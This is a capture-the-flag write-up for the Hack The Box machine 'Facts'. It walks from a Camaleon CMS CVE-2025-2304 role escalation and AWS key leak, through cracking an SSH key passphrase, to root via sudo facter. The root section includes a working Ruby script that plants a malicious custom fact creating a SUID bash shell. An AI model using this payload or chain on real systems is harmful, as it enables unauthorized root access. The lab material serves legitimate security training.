---
# System prepended metadata

title: 'HTB Machines :: Facts'

---

# HTB Machines :: Facts Writeup

![image](https://hackmd.io/_uploads/rJQ4S5G9-e.png)

## Reconnaissance

We begin by adding the target to `/etc/hosts` for name resolution and running an *nmap* scan to enumerate the open ports.

### Network Scan

The initial `nmap` scan shows that ports 80, 1433 and 5985 are open, so the machine is hosting a web server and a Microsoft SQL database.

![image](https://hackmd.io/_uploads/rksTIqf5be.png)

## Enumeration

### Website Enumeration

Checking `http://facts.htb` shows a trivia website, but there is nothing interesting here.

![image](https://hackmd.io/_uploads/SJ9t89M5Wx.png)
![image](https://hackmd.io/_uploads/SJejL5GqZx.png)


### Directory Enumeration

Using *gobuster*, we brute-forced directories on the site and got a few hits, most notably `/admin`.

![image](https://hackmd.io/_uploads/Sy0cwcf9bl.png)

The login page allows self-registration, so we created a dummy account with the following credentials:

```
johnr : johnr123
```

The admin panel reveals that the site runs Camaleon CMS v2.9.0.

![image](https://hackmd.io/_uploads/rJeR_5zq-x.png)

## Exploitation

Camaleon CMS v2.9.0 is quite outdated, and it is vulnerable to CVE-2025-2304.

### CVE-2025-2304

![image](https://hackmd.io/_uploads/ryUaK5GcWl.png)

This CVE is a post-authentication privilege escalation and AWS credential leak, which we can exploit with this [script](https://github.com/Alien0ne/CVE-2025-2304).

![image](https://hackmd.io/_uploads/BkXBcqMq-g.png)
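The public advisory for this CVE describes the root cause as mass assignment: the self-service profile update accepted a user-supplied `role` attribute, so any registered account could promote itself to admin and then read the AWS keys from the admin settings. The following is an added example, not part of the original writeup and not Camaleon's code, that shows that bug class in plain Ruby beside the hardened form (an allow-list modelled on Rails strong parameters plus an authorization check tied to the acting user). The class and function names and the request body are hypothetical.

```ruby
# Added example, not from the original writeup or from Camaleon CMS: a plain-Ruby
# model of the bug class behind CVE-2025-2304 (mass assignment of a privileged
# attribute on a self-service profile update) next to the hardened version.
# User, PROFILE_FIELDS, update_profile_* and ATTACKER_PARAMS are hypothetical names.

class User
  attr_accessor :username, :email, :role

  def initialize(username:, email:, role: 'client')
    @username = username
    @email = email
    @role = role
  end

  # Vulnerable pattern: every key in the request body becomes a setter call,
  # so a profile form can also rewrite `role`, even though it never renders it.
  def assign_all(params)
    params.each { |key, value| public_send("#{key}=", value) }
    self
  end
end

# Hardened pattern: only an explicit allow-list reaches the model, and the
# privileged attribute needs a server-side check on the *acting* user.
PROFILE_FIELDS = %w[username email].freeze

def permit(params, allowed)
  params.select { |key, _| allowed.include?(key.to_s) }
end

def update_profile_vulnerable(user, params)
  user.assign_all(params)
end

def update_profile_hardened(user, params, acting_user:)
  user.assign_all(permit(params, PROFILE_FIELDS))
  if params.key?('role')
    raise 'role change requires an administrator' unless acting_user.role == 'admin'
    user.role = params['role']
  end
  user
end

# Constructed request body: the attacker added a `role` field to the profile update.
ATTACKER_PARAMS = { 'username' => 'johnr', 'email' => 'johnr@example.com', 'role' => 'admin' }.freeze

if __FILE__ == $PROGRAM_NAME
  victim = User.new(username: 'johnr', email: 'j@example.com')
  puts "vulnerable: role=#{update_profile_vulnerable(victim, ATTACKER_PARAMS).role}"
  other = User.new(username: 'johnr', email: 'j@example.com')
  begin
    update_profile_hardened(other, ATTACKER_PARAMS, acting_user: other)
  rescue RuntimeError => e
    puts "hardened: #{e.message} (role stays #{other.role})"
  end
end
```

The point of the hardened version is that filtering parameters alone is not enough: the `role` change is still possible, but only when the request comes from a user who already holds the admin role, which is checked server-side rather than inferred from the submitted form.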

Listing the S3 bucket with the leaked credentials reveals an SSH private key, which we can use to log in via SSH.

![image](https://hackmd.io/_uploads/r157o5G5Zg.png)
![image](https://hackmd.io/_uploads/B1sdo5G5Ze.png)

## Privilege Escalation (User)


![image](https://hackmd.io/_uploads/HJlR2cM5bg.png)

Inspecting the key file shows that it is passphrase-protected, so we first convert it with ssh2john and crack the passphrase with hashcat, which yields `dragonballz`.

![image](https://hackmd.io/_uploads/HyZo1oG5Zl.png)
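Whether a key needs cracking at all is decided by the header of the `openssh-key-v1` container: the cipher name, the KDF name and, for bcrypt, the salt and round count. Those are exactly the fields ssh2john pulls out before hashcat goes to work. The parser below is an added example, not part of the original writeup; the two PEM samples it parses are constructed in the code (a valid header in front of dummy key material, not real keys), and the helper names are assumptions.

```ruby
# Added example, not from the original writeup: a minimal parser for the
# "openssh-key-v1" container used by modern id_* files. It reads the header
# fields ssh2john extracts (cipher, KDF, salt, rounds) to report whether a key
# is passphrase-protected and therefore needs cracking before it can be used.
MAGIC = "openssh-key-v1\0".b

# SSH wire "string": 4-byte big-endian length followed by the bytes.
def ssh_string(bytes)
  [bytes.bytesize].pack('N') + bytes.b
end

def read_string(buf, pos)
  len = buf[pos, 4].unpack1('N')
  [buf[pos + 4, len], pos + 4 + len]
end

def parse_openssh_key(pem)
  body = pem.lines.reject { |l| l.start_with?('-----') }.join
  blob = body.unpack1('m')                          # lenient base64 decode
  raise ArgumentError, 'not an openssh-key-v1 container' unless blob.start_with?(MAGIC)

  pos = MAGIC.bytesize
  cipher, pos = read_string(blob, pos)
  kdf, pos = read_string(blob, pos)
  kdfopts, pos = read_string(blob, pos)
  nkeys = blob[pos, 4].unpack1('N')
  info = { cipher: cipher, kdf: kdf, nkeys: nkeys, encrypted: cipher != 'none' }
  if kdf == 'bcrypt'
    # bcrypt KDF options are: string salt, uint32 rounds
    salt, opt_pos = read_string(kdfopts, 0)
    info[:salt_hex] = salt.unpack1('H*')
    info[:rounds] = kdfopts[opt_pos, 4].unpack1('N')
  end
  info
end

# Constructed samples (NOT real keys): a correct header followed by a dummy
# public-key blob and an opaque private section, enough to exercise the parser.
def build_sample(cipher:, kdf:, kdfopts:)
  blob = MAGIC + ssh_string(cipher) + ssh_string(kdf) + ssh_string(kdfopts) +
         [1].pack('N') + ssh_string("\x00" * 51) + ssh_string("\x00" * 80)
  "-----BEGIN OPENSSH PRIVATE KEY-----\n" +
    [blob].pack('m0').scan(/.{1,70}/).join("\n") +
    "\n-----END OPENSSH PRIVATE KEY-----\n"
end

ENCRYPTED_SAMPLE = build_sample(cipher: 'aes256-ctr', kdf: 'bcrypt',
                                kdfopts: ssh_string("\x01" * 16) + [16].pack('N'))
PLAIN_SAMPLE = build_sample(cipher: 'none', kdf: 'none', kdfopts: '')

if __FILE__ == $PROGRAM_NAME
  [ENCRYPTED_SAMPLE, PLAIN_SAMPLE].each do |pem|
    info = parse_openssh_key(pem)
    if info[:encrypted]
      puts "encrypted with #{info[:cipher]} (#{info[:kdf]}, #{info[:rounds]} rounds): ssh2john + hashcat"
    else
      puts 'unencrypted: usable directly with ssh -i'
    end
  end
end
```

A `cipher` of `none` means the private section is stored in the clear and the key can be used as-is; anything else (typically `aes256-ctr` with the `bcrypt` KDF) means a passphrase is required, and the round count is what makes each hashcat guess expensive.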

And we're in as `trivia`. However, the user flag is not in `trivia`'s home directory. Listing `/home` shows another user, `william`, and we retrieved the flag from that user's home directory.

![image](https://hackmd.io/_uploads/rks8kjG5Zg.png)

```
User Flag : 17279e4c5b001d5072fbf5c0d5cee4f7
```

## Privilege Escalation (Root)

Checking the privileges of `trivia`, we found that it can run an interesting program, `/usr/bin/facter`, with elevated privileges.

![image](https://hackmd.io/_uploads/H14ggiz9Wg.png)

A bit of research shows that facter is Puppet's system-facts tool: it collects facts about the host and loads custom facts written as Ruby files. We can abuse this by writing a malicious custom fact in Ruby and loading it with facter.

![image](https://hackmd.io/_uploads/HkTu-iMcZe.png)
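A custom fact is just a Ruby file that facter evaluates when it loads a custom-fact directory, so whatever the fact's `setcode` block does runs as the user who invoked facter, which is root when facter is run through sudo. The script below is an added example, not the writeup's own payload: it generates such a fact file, installs it into a directory, and prints the facter invocation that would trigger it. The directory, the fact name, the payload command and the `--custom-dir` flag (facter 3/4; facter 2 reads the `FACTERLIB` environment variable instead) are assumptions about the target, not details taken from the page.

```ruby
require 'fileutils'
require 'tmpdir'

# Added example, not from the original writeup: builds the malicious custom fact
# described above. Facter evaluates every *.rb file in a custom-fact directory
# as Ruby, so a fact's `setcode` block runs with the privileges of whoever
# invoked facter (root under sudo). The directory, fact name, payload command
# and the --custom-dir flag are assumptions for illustration.
def custom_fact_source(fact_name, command)
  <<~RUBY
    # Custom fact: resolving it executes the embedded command.
    Facter.add(#{fact_name.to_sym.inspect}) do
      setcode do
        system(#{command.inspect})      # runs as the facter process owner
        $?.exitstatus                   # the "fact value" facter prints
      end
    end
  RUBY
end

# Writes the fact into a directory facter can be pointed at and returns its path.
def install_custom_fact(dir, fact_name, command)
  FileUtils.mkdir_p(dir)
  path = File.join(dir, "#{fact_name}.rb")
  File.write(path, custom_fact_source(fact_name, command))
  path
end

# How the fact would be triggered on the target. --custom-dir is the facter 3/4
# flag; facter 2 reads the FACTERLIB environment variable instead.
def facter_invocation(dir, fact_name)
  "sudo /usr/bin/facter --custom-dir #{dir} #{fact_name}"
end

if __FILE__ == $PROGRAM_NAME
  dir = Dir.mktmpdir('facts')                      # stand-in for a writable dir on the box
  path = install_custom_fact(dir, 'pwn', 'cp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash')
  puts File.read(path)
  puts facter_invocation(dir, 'pwn')
  # After running that on the target, `/tmp/rootbash -p` keeps the root euid.
end
```

Requesting the fact by name (the last argument) is what forces facter to resolve it and run `setcode`; the generated file must be syntactically valid Ruby or facter will skip it with a load error instead of running the payload.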

And we gain root access.

![image](https://hackmd.io/_uploads/ryA9bof5bl.png)

```
Root Flag : 0201aac03c786e1a6740458ee8819116
```